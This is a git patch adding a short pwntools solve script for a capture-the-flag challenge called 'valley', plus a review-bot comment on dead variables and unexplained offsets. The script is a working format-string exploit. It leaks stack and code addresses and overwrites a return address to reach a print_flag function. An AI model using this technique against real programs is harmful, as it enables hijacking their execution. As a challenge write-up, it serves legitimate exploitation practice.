From 1389af0b50528de486ee30d74e3a821fde2790c3 Mon Sep 17 00:00:00 2001
From: jc
Date: Sun, 16 Mar 2025 22:32:35 +0300
Subject: [PATCH] solve script

---
 random_challs/valley/a.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 random_challs/valley/a.py

diff --git a/random_challs/valley/a.py b/random_challs/valley/a.py
new file mode 100644
index 0000000..e6775fe
--- /dev/null
+++ b/random_challs/valley/a.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./valley", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendline(a)
+
+# leak
+s(b"%25$p.%20$p")
+r.recvuntil(b": ")
+leaks = r.recvlineS().split(".")
+print_flag = int(leaks[0], 16) - 0x198
+log.info("print_flag: %#x", print_flag)
+stack_addr = int(leaks[1], 16)+0x8
+log.info("stack_addr: %#x", stack_addr)
+some_addr = print_flag + 0x2d97
+
+# write
+writes = {stack_addr:print_flag}
+fs = fmtstr_payload(6, writes, write_size='short')
+ss(fs)
+ss(b"exit")
+
+r.interactive()
\ No newline at end of file
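Review bot: `some_addr = print_flag + 0x2d97` is assigned but never read anywhere in the file, so it is dead code and should be removed or given a use. The offsets `0x198`, `0x8` and `0x2d97` also carry no explanation of where they were derived from, which makes the script unmaintainable once the binary is rebuilt; a one-line comment next to each stating the symbol or frame it is relative to (e.g. `# offset from leaked return address to print_flag, per disassembly`) would suffice. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows. Additionally `libc = target.libc` is assigned but unused.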